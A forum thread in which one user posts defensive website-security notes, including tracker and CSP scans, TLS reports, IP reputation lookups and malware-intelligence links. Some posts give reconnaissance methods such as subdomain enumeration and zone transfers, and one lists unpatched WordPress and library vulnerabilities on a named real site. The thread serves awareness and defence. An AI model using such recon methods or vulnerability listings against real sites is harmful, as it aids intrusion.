Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2020, 10:24:31 PM
Establish ad-tracking from three scan sources:
1. https://whotracks.me/websites/rijmwoordenboek.nl.html
2. https://urlscan.io/result/a317a0a7-0228-4827-94ed-a9c080b3f0ea#transactions
3. https://rijmwoordenboek.nl/
Privacy impact = E-grade status.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 20, 2020, 09:52:38 PM
Check subdomain enumeration: search query = site:example.com
& https://pentest-tools.com/information-gathering/find-subdomains-of-domain#
or  https://www.ultratools.com/
also  https://securitytrails.com/dns-trails

Quote
subdomain enumeration methods
Scraping
Brute-force
Alterations & permutations of already known subdomains
Online DNS tools
SSL certificates
Certificate Transparency
Search engines
Public datasets
DNS aggregators
Git repositories
Text parsing (HTML, JavaScript, documents…)
VHost discovery
ASN discovery
Reverse DNS
Zone transfer (AXFR)
DNSSEC zone walking
DNS cache snooping
Content-Security-Policy HTTP headers
Sender Policy Framework (SPF) records
Subject Alternate Name (SAN)
info source credits go to SecOff.

polonus


Title: Re: Tests and other Media topics
Post by: polonus on March 03, 2020, 10:43:34 PM
Because of a bug Let's Encrypt revokes 3.000.000 certificates:
Read: https://community.letsencrypt.org/t/revoking-certain-certificates-on-march-4/114864

Test here if your cert was being revoked: https://checkhost.unboundtest.com/

Later they decided they would not do that, read https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591
(really a good thing, while everything went right except for the CAA authentication)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 07, 2020, 03:25:54 PM
L.S.

On this Australian website I found a tracker named Tealium: -https://www.news.com.au/

Checked @whotracks.me: https://whotracks.me/trackers/tealium.html
& https://whotracks.me/websites/instagram.com.html

Also consider: https://webcookies.org/cookies/www.news.com.au/2208692?353391

CSP policy
Quote
block-all-mixed-content;
style-src https: 'unsafe-inline';
script-src https: blob: 'unsafe-inline' 'unsafe-eval';
img-src https: data:;
frame-src https:;
with high risk setting: errorscript-src
expand_more
errorhttps:
https: URI in script-src allows the execution of unsafe scripts.
checkblob:
error'unsafe-inline'
'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
help_outline'unsafe-eval'
'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
&
object-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
Also check policy using  https://csp-evaluator.withgoogle.com/ ->
Quote
checkblock-all-mixed-content
expand_more

checkstyle-src
expand_more
checkhttps:
check'unsafe-inline'

errorscript-src
Host whitelists can frequently be bypassed. Consider using 'strict-dynamic' in combination with CSP nonces or hashes.
expand_more
errorhttps:
https: URI in script-src allows the execution of unsafe scripts.
checkblob:
error'unsafe-inline'
'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
help_outline'unsafe-eval'
'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().

checkimg-src
expand_more
checkhttps:
checkdata:

checkframe-src
expand_more
checkhttps:

errorobject-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
expand_more

info_outlinerequire-trusted-types-for [missing]
Consider requiring Trusted Types for scripts to lock down DOM XSS injection sinks. You can do this by adding "require-trusted-types-for 'script' to your policy

Blocked for me in the browser are -resources.newscdn.com.au & -multitools.newscdn.com.au, -tags.tiqcdn.com, -e.infogram.com &
-tags.news.com.au.

Re: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3Lm57d3MuXl1tLnx1YA%3D%3D~enc

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on March 07, 2020, 03:29:49 PM
I venture to say that almost all news sites you visit will probably at least try to track your location.
The question remains, what are they doing with the information they've collected?
Title: Re: Tests and other Media topics
Post by: polonus on March 07, 2020, 03:43:56 PM
Hi bob3160,

Indeed, bob3160. It is not so much they track and collect (y)our data. They apparently are sitting on loads and loads of data.
More interesting is the answer to "To do what?". Sell it to the highest bidder and that can be both commerce and your government.
Hopefully it does not land in some form at the wrong competitor's or the wrong state agent's desks.

It is not so much they do it, it is more end-users being aware that this is going on inside their browsers "at the other side of their screens" and that 7/24/365 all year round, when and where they are mostly unaware of it. OK when they asked you to participate so they could come up with interesting ads at your doorstep, as the flyer-boy did in the past.

And then you always have adblockers and script-blockers to stem out he worst of it.  ;)  :)

Thing for us here is that ads sometimes come malware-laden and then you like to cling to that ad-blocker of choice,
no matter how many times you are begged to take these ad-blocking-visors down.
Or with a pay wall you stop visiting such a nagging page altogether.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 08, 2020, 12:27:01 AM
Do not fall for a PHISH? Normally avast and avast secure browser and avast browser extension will keep you from visiting existing PHISHING websites, but we can also scan or be alerted.
Over 5.000 plus PHISHING sites reported every day here: https://openphish.com/
And recent submissions here: https://www.phishtank.com/
Cert Transparency and find a PHISH before it finds you: https://certstream.calidog.io/ https://phishfinder.io/

polonus

Title: Re: Tests and other Media topics
Post by: polonus on March 08, 2020, 02:06:09 PM
Brave New World scenario: biohackers encoded computer malware inside DNA.
Read: https://www.wired.com/story/malware-dna-hack/

Time to explore some common ways of obfuscation malcreants use from day to day:
Read: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0

The tools: https://turgensec.com/Obscurity/Obscurity.html

Forewarned is forearmed,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 14, 2020, 02:33:17 PM
Many of us, sitting at home now, have ample time on our hands to test, lint and fuzz JavaScript code:
Explore online tools at: https://webtoolkitonline.com/

Very interesting for those into JavaScript  security and all others that take an interest in the subject.

Just an example from a Vulners Webscanner extension loaded content.js script,
content.js via Ctrl+Shift+I (inside the browser console).

Let's go. Following the yellow alert triangle we see:
We can us eeither
Javascript Tester online:  https://webtoolkitonline.com/javascript-tester.html  (https://webtoolkitonline.com/javascript-tester.html)
Tevens:  https://codebeautify.org/jsvalidate  (https://codebeautify.org/jsvalidate) 
via de laatste tool ->

Validation of a simple vulners script against regexp->
Quote
1   1   1   'console' was used before it was defined.
console.log('[VULNERS] Init');
2   3   1   'v_browser' was used before it was defined.
v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {
3   3   57   'rules' was used before it was defined.
v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {
4   3   56   Unexpected '('.
v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {
5   3   65   Missing space between '=' and '>'.
v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {
6   3   65   Unexpected '>'.
v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {


Quite some task but very instructing. Pay attention to certain patterns and learn to recognize those patterns.
You learn to hear the JavaScript grass grow with your ear stuck (stack?) firmly unto the ground. ( } >;).

Regards to everyone here. A good week and most of all stay in good health ye all,
Info credits go to luntrus

polonus (volunteer 3rd party cold recon (JavaScript)-security website analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 15, 2020, 04:29:05 PM
Seen in the light of COVID-19 precaution measures, we remind that all scans can be  safely run online without any human contact or paperwork. ;) Keep your devices, keyboards and screens clean and away from others.

Scan website security headers. Often malicious website have low scores in this respect,
the following one has a D-score: https://securityheaders.com/?q=https%3A%2F%2Fonedrive.live.com&followRedirects=on

This site is spreading malware, see: https://urlhaus.abuse.ch/url/325253/   

Also consider a bewildering A score here: https://www.immuniweb.com/websec/?id=N1Mnj70i
Compare to: https://webcookies.org/ssl/report/onedrive.live.com/193599

Missing headers:
Quote
Missing Headers
Content-Security-Policy   Content Security Policy is an effective measure to protect your site from XSS attacks. By whitelisting sources of approved content, you can prevent the browser from loading malicious assets.

X-Frame-Options   X-Frame-Options tells the browser whether you want to allow your site to be framed or not. By preventing a browser from framing your site you can defend against attacks like clickjacking. Recommended value "X-Frame-Options: SAMEORIGIN".

Referrer-Policy   Referrer Policy is a new header that allows a site to control how much information the browser includes with navigations away from a document and should be set by all sites.

Feature-Policy   Feature Policy is a new header that allows a site to control which features and APIs can be used in the browser.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 30, 2020, 02:38:09 PM
Mozilla will bring https-only-mode to Firefox 76.
Read: https://bugzilla.mozilla.org/show_bug.cgi?id=1613063
So test here: https://www.cdn77.com/tls-test
or using tools found here: https://geekflare.com/ssl-test-certificate/

See https-everywhere atlas: https://atlas.eff.org
The static site generator for https-everywhere to be found here: https://github.com/EFForg/https-everywhere-atlas

And accompanying browser cookie dilemma's:
https://nakedsecurity.sophos.com/2015/02/02/anatomy-of-a-browser-dilemma-how-hsts-supercookies-make-you-choose-between-privacy-or-security/

Scan: https://webcookies.org/  &  https://securityheaders.com/?q=

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on April 13, 2020, 02:23:23 PM
The privacy implications of visiting some social media site?
Are we aware of what data we will share with Big Surveillance Data Grab Corporations?

Random example: https://webcookies.org/cookies/www.reddit.com/2247338
1st party cookies 7, css 1 for *reddit.com and 1 script;
*reddit.media.com  with 1 image;
*redditstatic.com css 5, 23 scripts and 1 other.
Consider: http://ssl-checker.online-domain-tools.com/
Quote
The results for host reddit.com (IP address 151.101.193.140) on port 443:

Problems Summary
BEAST vulnerability (CVE-2011-3389) is NOT mitigated on server.
Certificate Chain
Main Server Certificate
Subject Name:   *.reddit.com
Subject Data:   O=Reddit Inc., L=San Francisco, S=California, C=US
Alternative Names:   *.reddit.com, reddit.com
Prefix Handling:   Yes (with and without www)
Valid From:   2020-04-06 00:00:00 UTC
Valid To:   2020-10-03 12:00:00 UTC (expires in 6 months)
Key:   RSA 2048 bits (e 65537)
Signature Algorithm:   SHA256withRSA
Fingerprint:   4f476c62b996aaddf5d37b746f9953fc0e9db2d9
Issuer Name:   DigiCert SHA2 Secure Server CA
Issuer Data:   O=DigiCert Inc, C=US
Extended Validation:   No
Certificate Transparency:   Yes
Revocation Information:   OCSP, CRL
Revocation Status:   Not revoked
Weak Debian Key:   No
Self-signed:   No
Trusted:   Yes (Apple, Java, Microsoft, Mozilla)
Chain Certificate #2
Subject Name:   DigiCert SHA2 Secure Server CA
Subject Data:   O=DigiCert Inc, C=US
Valid To:   2023-03-08 12:00:00 UTC (expires in 2 years)
Key:   RSA 2048 bits (e 65537)
Signature Algorithm:   SHA256withRSA
Fingerprint:   1fb86b1168ec743154062e8c9cc5b171a4b7ccb4
Issuer Name:   DigiCert Global Root CA
Issuer Data:   O=DigiCert Inc, OU=www.digicert.com, C=US
Revocation Status:   Not revoked
Weak Debian Key:   No
Self-signed:   No
Certificate Paths
Path #1 (TRUSTED)
1   Sent by server
*.reddit.com
4f476c62b996aaddf5d37b746f9953fc0e9db2d9
RSA 2048 bits / SHA256withRSA
2   Sent by server
DigiCert SHA2 Secure Server CA
1fb86b1168ec743154062e8c9cc5b171a4b7ccb4
RSA 2048 bits / SHA256withRSA
3   In trust store
DigiCert Global Root CA (self-signed)
a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436
RSA 2048 bits / SHA1withRSA
Protocol Details
Details
Secure Renegotiation   Unknown
Secure Client-Initiated Renegotiation   Unknown
Insecure Client-Initiated Renegotiation   Unknown
OCSP Stampling   Yes
Strict Transport Security (HSTS)   Yes
Session Resumption (Session IDs)   Yes
Session Resumption (Session Tickets)   Yes
Deflate Compression   No
Downgrade Attack Prevention (TLS_FALLBACK_SCSV)   Yes
Supports Insecure Ciphers   No
Supports Weak Ciphers   No
Common DH Prime   No
Forward Secrecy   Yes
BREACH Vulnerability   No
CRIME Vulnerability   No
OpenSSL CCS Injection   No
Heartbleed Vulnerability   No
POODLE Vulnerability   No
BEAST Vulnerability   Yes
FREAK Vulnerability   No
LOGJAM Vulnerability   No
Supported Protocols and Cipher Suites
TLS 1.2
Supported   Yes
Cipher Suite   Grade   KeySize   FS   Export   Anon   Preferred
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)   Secure   128   Yes   No   No   Yes
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030)   Secure   256   Yes   No   No   No
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)   Secure   256   Yes   No   No   No
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xc028)   Secure   256   Yes   No   No   No
TLS_RSA_WITH_AES_256_CBC_SHA (0x35)   Secure   256   No   No   No   No
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)   Secure   128   Yes   No   No   No
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xc027)   Secure   128   Yes   No   No   No
TLS_RSA_WITH_AES_128_GCM_SHA256 (0x9c)   Secure   128   No   No   No   No
TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)   Secure   128   No   No   No   No
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x0a)   Secure   112   No   No   No   No
TLS 1.1
Supported   Yes
Cipher Suite   Grade   KeySize   FS   Export   Anon   Preferred
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)   Secure   128   Yes   No   No   Yes
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)   Secure   256   Yes   No   No   No
TLS_RSA_WITH_AES_256_CBC_SHA (0x35)   Secure   256   No   No   No   No
TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)   Secure   128   No   No   No   No
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x0a)   Secure   112   No   No   No   No
TLS 1.0
Supported   Yes
Cipher Suite   Grade   KeySize   FS   Export   Anon   Preferred
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)   Secure   128   Yes   No   No   Yes
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)   Secure   256   Yes   No   No   No
TLS_RSA_WITH_AES_256_CBC_SHA (0x35)   Secure   256   No   No   No   No
TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)   Secure   128   No   No   No   No
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x0a)   Secure   112   No   No   No   No
SSL 3
Supported   No
SSL 2
Supported   No

Then see: https://urlscan.io/result/7604b6e3-3cb7-4ea1-a6e4-47f28d78fb76
Hosting met recapcha: https://www.shodan.io/host/151.101.117.140/raw

100% of the trackers on this site could be protecting you from NSA snooping for *redditstatic.com,
not secure against snoopers: https://webcookies.org/cookies/www.redditstatic.com/18587196

Security capped at F-status: https://observatory.mozilla.org/analyze/www.reddit.com

Not an ideal situation friends during lock-down Big Brother surveillance out-time, just com and realize these facts.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)



Title: Re: Tests and other Media topics
Post by: polonus on April 18, 2020, 09:33:55 PM
Test Border Gateway Protocol for safety here: https://isbgpsafeyet.com/
Why important?
A BGP hijack occurs when a malicious node deceives another node, lying about what the routes are for its neighbors. Without any security protocols, this misinformation can propagate from node to node, until a large number of nodes now know about, and attempt to use these incorrect, nonexistent, or malicious routes.

For BGP to be safe, all of the major ISPs will need to embrace RPKI. Sharing this page will increase awareness of the problem which can ultimately pressure ISPs into implementing RPKI for the good of themselves and the general public. You can also reach out to your service provider or hosting company directly and ask them to deploy RPKI and join MANRS. When the Internet is safe, everybody wins.

Implementing: https://blog.cloudflare.com/cloudflares-rpki-toolkit/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 19, 2020, 03:28:40 PM
To monitor my connections I run Nir Sofer's SmartSniff tool.
Example:
3676   TCP   192.168.U.UU   172.217.17.131   49430   443      -gstaticadssl.l.google.com   https   75  {75 ; 0}   44.304 Bytes  {44.304 ; 0}   47.861 Bytes  {47.304 ; 557}   26.4 KB/Sec   19-4-2020 15:09:34:PPP   19-4-2020 15:09:35:PPP   00:00:01.6VV   XX-xx-xx-xx-xx-xx   zz-zz-zz-zz-zz-zz   (blurred with UPVx&z by me, pol)

Checked here:    https://ipinfolookup.com/172.217.17.36   &  here:  https://www.shodan.io/host/172.217.17.36
& https://www.shodan.io/host/172.217.17.36/raw 
Consider also: https://www.lookip.net/ip/172.217.17.36   &   https://ipinfo.io/172.217.17.36
Discussion here (TLL value related) https://github.com/googlehosts/hosts/issues/321
and https://www.site24x7.com/public/t/results-1577438856577.html    and   https://db-ip.com/all/172.217.17 (Spain,
but actually I connected here: https://db-ip.com/172.217.17.36     =    ams16s29-in-f4.1e100.net

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on April 19, 2020, 03:40:58 PM
My connections are monitored by Avast Omni (https://www.avast.com/en-us/omni#omni). :)
Title: Re: Tests and other Media topics
Post by: polonus on April 19, 2020, 07:40:26 PM
Not arguing with that, bob3160, but that is an all purpose tool, and I am just talking checking on IP connections here.
Re: https://www.projecthoneypot.org/list_of_ips.php
This IP not detected: 69.30.232.50 but flagged here: https://maltiverse.com/ip/69.30.232.50 Spammer
Another one: https://www.fortypoundhead.com/tools_ipcheck.asp
Also good to detect mail policy rule breakers: https://www.abusix.ai/search?q=104.31.75.87
Compare with: https://www.projecthoneypot.org/ip_104.31.75.87

polonus



Title: Re: Tests and other Media topics
Post by: polonus on April 20, 2020, 10:12:17 PM
About combining resources.
Agent Tesla - in the news:
https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
Example: https://urlhaus.abuse.ch/url/346766/
On IP: https://www.shodan.io/host/95.163.208.51
Only spamhaus to detect: https://www.virustotal.com/gui/url/16575df43aa87b759e35647d0bfa6779b6f603944d8be878f4ea3ef61d8961f3/detection
Detections: https://www.virustotal.com/gui/ip-address/95.163.208.51/relations
Information resource: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
and so we have closed this combining resources cycle back to where we have begun.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2020, 03:40:18 PM
 :-\YARA -> read: https://yara.readthedocs.io/en/stable/index.html
and https://virustotal.github.io/yara/  (page is temp. down for maintenance)...
Resources with YARA rules: https://capesandbox.com/analysis/1118/
and
https://malpedia.caad.fkie.fraunhofer.de/

Non-public part: https://github.com/malpedia/feedback/issues
Also, please be aware that not all content on Malpedia is publicly available.
More specifically, you will need an account to access all data (malware samples, non-public YARA rules, ...).
In this regard, Malpedia is operated as an invite-only trust group.

And: https://valhalla.nextron-systems.com/  ->  support.knowbe4.com  & cythereal/threat-intelligence

YARA on VirusTotal: https://support.virustotal.com/hc/en-us/articles/115002178945-YARA
Read: https://securityintelligence.com/signature-based-detection-with-yara/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2020, 10:02:11 PM
Just starting from an abuse IP and further accompanying info
we could analyze for instance a global intrusion campaign by APT41 state actors below.

Re: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
blog info on a particular abuse of CITRIX server flaw.
Found in this database: https://www.abuseipdb.com/check/66.42.98.220
and analyzed here: https://www.joesandbox.com/analysis/214068/0/html  (impressive)....
Consider also what was being abused: https://exploits.shodan.io/?q=Citrix

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 12:00:21 AM
Yara rule example -> https://capesandbox.com/analysis/2115/
Consider: https://github.com/godaddy/yara-rules/blob/master/emotet.yara
and read: https://blog.malwarebytes.com/security-world/technology/2017/09/explained-yara-rules/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 12:24:46 PM
L.S.

Now combining this with starting from a known malicious or suspicious IP.
Random example from Mainland China: https://www.abuseipdb.com/check/58.221.84.90
& https://www.shodan.io/host/58.221.84.90  &  malicious host: https://maltiverse.com/ip/58.221.84.90
where we always should check: https://www.virustotal.com/gui/url/340dbe0113dfca01b3d129e4d04438f65b3117b6fabb5a6f973aadee04cf1d5c/detection
& https://www.virustotal.com/gui/ip-address/58.221.84.90/relations
Trackers from - at least 1 third parties know you are on this webpage.
-mail.hhitcloud.cn  -mail.hhitcloud.cn -> https://webhint.io/scanner/8d88c85a-5e9c-4101-a7c1-cb94db17e185
Netcraft risk status - 10 red out of 10: https://sitereport.netcraft.com/?url=http%3A%2F%2Fmail.hhitcloud.cn
Listed and blocked as with Hackers, Spyware, Botnets etc.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 02:56:59 PM
SSH BruteForce attacker, scanner -> https://www.abuseipdb.com/check/188.166.147.211
Re host: https://www.shodan.io/host/188.166.147.211
See: https://viz.greynoise.io/ip/188.166.147.211
Consider info: https://report.cs.rutgers.edu/mrtg/drop/dropstat.cgi?start=-1d
Protection -> https://www.badips.com/  from the abuse tracker's mouth: https://www.badips.com/info

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 10:01:10 PM
We used to have these threats included on various online website scanners.
That is why we are missing this site: https://archive.is/urlquery.net
https://rules.emergingthreats.net/
Example of category: https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt
Oisf-users Archive: https://lists.openinfosecfoundation.org/pipermail/oisf-users/  (Suricata rules)

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 26, 2020, 07:13:57 PM
Example of a Trickbot EXE analysis comparison from various (re)sources:
Regex examples: https://nullsecure.org/malware-traffic-analysis-using-splunk/
On pastebin: https://pastebin.com/6U27ZZd3
On capesandbox: https://capesandbox.com/analysis/1628/
On a particular trickbot IP: https://www.abuseipdb.com/check/107.172.236.237
Similar: https://urlhaus.abuse.ch/url/347024/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 27, 2020, 12:35:53 AM
Normally you do not get the following info directly from inside the webbrowser.

So we opened up Ctrl+Shift+I (developer console information)
together with a run of the Quick Source Viewer extension to get:

Quote
  js flexbox canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths">
<

&
Quote
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

INLINE: var script_urls = '["-https://static.shodan.io/jquery/js/jquery.js", "https:
245 bytes

INLINE: (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i
&
On CSS-5
Quote
INJECTED

INLINE: :root #content > #right > .dose > .dosesingle, :root #content > #center > .dose
120 bytes INJECTED

INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED
What we scanned -> Results from scanning URL: -https://cdn.maptiler.com/mapbox-gl-js/v0.53.0/mapbox-gl.js
Number of sources found: 25
Number of sinks found: 2
Quote
HTML
-static.shodan.io/bootstrap/js/bootstrap.min.js
26,015 bytes, 41 nodes

Javascript 1   (external 0, inline 1)
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

CSS 1   (external 0, inline 1)
INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED

Tips
Quote
Shows current sources in the DOM.
"INJECTED" nodes have been injected to DOM by Javascript after initial page load.
Press B to toggle beautifier.
Press N to toggle line numbers.
Adjust options of this extension.

All valuable information as we start to analyze website code or script vulnerabilities (flaws),

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 29, 2020, 04:05:30 PM
Interaction of two online resources (malpedia & URLhaus).
Buzzword RATs and in particular Mozi: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi
and https://urlhaus.abuse.ch/browse/
Read article: https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848
No existing YARA rule for Mozi, -> https://www.joesandbox.com/search?q=Mozi.m
particular example: https://www.joesandbox.com/analysis/343770
Re: https://www.joesandbox.com/analysis/223570/0/pdf
See: https://urlhaus.abuse.ch/browse.php?search=162.212.114.3
link to https://www.shodan.io/host/162.212.114.3 and then to https://viz.greynoise.io/ip/162.212.114.3
Scans for port 2323 ->  As it's well-known that port 23 is very vulnerable, some people try to be „tricky" and use port 2323 for the same purpose as port 23. It's a very lazy solution and hackers know about this, that's why they usually scan this port too,

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 29, 2020, 09:47:03 PM
While reading this blog post at ZScaler's, I landed here to test
what has been kicked up through the Quick Source extension inside Google Chrome.

To fuzz inline scripts using this online tool: https://closure-compiler.appspot.com/home

After compiling I got "JSC_PARSE_ERROR: Parse error. In some cases, '<!--' and '-->' are treated as a '//' for legacy reasons. Removing this from your code is safe for all browsers currently in use. at line 5 character 19"
then delivering this OUTPUT of default.js
Quote
output_file_name=default.js
&js_code=%2F%2F%20ADD%20YOUR%20CODE%20HERE%0Afunction%20hello(name)%20%7B%0A%20%20alert('Hello%2C%20'%20%2B%20name)%3B%0A%7D%0Ahello('New%20user')%3B%20%3C!--%20%2F%2F%20--%3E%3C!%5BCDATA%5B%0 etc. etc. etc.
  Gaining quite some insights in the field of JavaScript analysis.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2020, 03:38:01 PM
Not malicious but here in the Hall of Shame:
Re: https://www.immuniweb.com/websec/?id=ZZv4yeuM
and https://urlscan.io/result/d73751bc-be77-4834-bc8a-b7089f662801
on hoster: https://www.shodan.io/host/88.99.247.221
Insecure:
Quote
This website is insecure.
33% of the trackers on this site could be protecting you from NSA snooping. Tell -koliee.ir to fix it.

Identifiers | All Trackers
* Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.

-7ocilktl9nkh7ihXXXXXXcebb0 -wXw.koliee.ir phpsessid

Retireable jQuery libraries:
Quote
bootstrap   3.3.7   Found in -http://www.koliee.ir/js/bootstrap.min.js<br>Vulnerability info: **
High   28236 XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2019-8331   
Medium   20184 XSS in data-target property of scrollspy CVE-2018-14041   
Medium   20184 XSS in collapse data-parent attribute CVE-2018-14040   
Medium   20184 XSS in data-container property of tooltip CVE-2018-14042   
jquery   3.2.1.min   Found in -http://www.koliee.ir/js/jquery-3.2.1.min.js<br>Vulnerability info:
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Blocked in the browser for me (pol): -www.smartsuppchat.com/​loader.js?
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

INLINE: var _smartsupp = _smartsupp || {}; _smartsupp.key = '00ff41XXXXXXXXXX54e1b6ae86
418 bytes

** bootstrap insecurity: -www.koliee.ir/css/​bootstrap.min.css
INJECTED

INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED

font insecurity version 4.7.0

linting report hints:  https://webhint.io/scanner/52b964c6-33f6-497e-b75d-1a569424149c
and especially here for this forum the 9 category of hints here:
https://webhint.io/scanner/52b964c6-33f6-497e-b75d-1a569424149c#category-security

for instance disown-opener flaw for -http://koliee.ir/blog/1395/07/20/%D9%85%D8%AF%D8%A7%D8%B1%DA%A9-%D9%84%D8%A7%D8%B2%D9%85-%D8%AC%D9%87%D8%AA-%D8%A7%D9%87%D8%AF%D8%A7%D8%A1-%DA%A9%D9%84%DB%8C%D9%87/

Word Press vuln. Wordpress - 4.6.18
7.5
WPVDB-ID:8941
WordPress <= 4.8.2 - $wpdb->prepare() Weakness
7.5
WPVDB-ID:10004
WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
7.5
WPVDB-ID:9912
WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
7.5
WPVDB-ID:9171
WordPress <= 5.0 - PHP Object Injection via Meta Data
7.5
WPVDB-ID:8730
WordPress 3.5-4.7.1 - WP_Query SQL Injection
7.5
WPVDB-ID:8905
WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
7.5
WPVDB-ID:8818
WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
6.8
WPVDB-ID:8720
WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
6.8
WPVDB-ID:9230
WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
6.8
WPVDB-ID:9913
WordPress <= 5.2.3 - Admin Referrer Validation
6.8
WPVDB-ID:8969
WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
6.5
WPVDB-ID:9100
WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
6.5
WPVDB-ID:9222
WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
6.5
WPVDB-ID:8766
WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
5.8
WPVDB-ID:9054
WordPress 3.7-4.9.4 - Use Safe Redirect for Login
5.8
WPVDB-ID:9053
WordPress 3.7-4.9.4 - Remove localhost Default
5.8
WPVDB-ID:9169
WordPress <= 5.0 - Authenticated File Delete
5.5
WPVDB-ID:8767
WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete
5.5
WPVDB-ID:8734
WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
5
WPVDB-ID:9909
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
5
WPVDB-ID:9911
WordPress <= 5.2.3 - JSON Request Cache Poisoning
5
WPVDB-ID:8911
WordPress 3.0-4.8.1 - Path Traversal in Unzipping
5
WPVDB-ID:8815
WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
5
WPVDB-ID:9973
WordPress <= 5.3 - Improper Access Controls in REST API
5
WPVDB-ID:8729
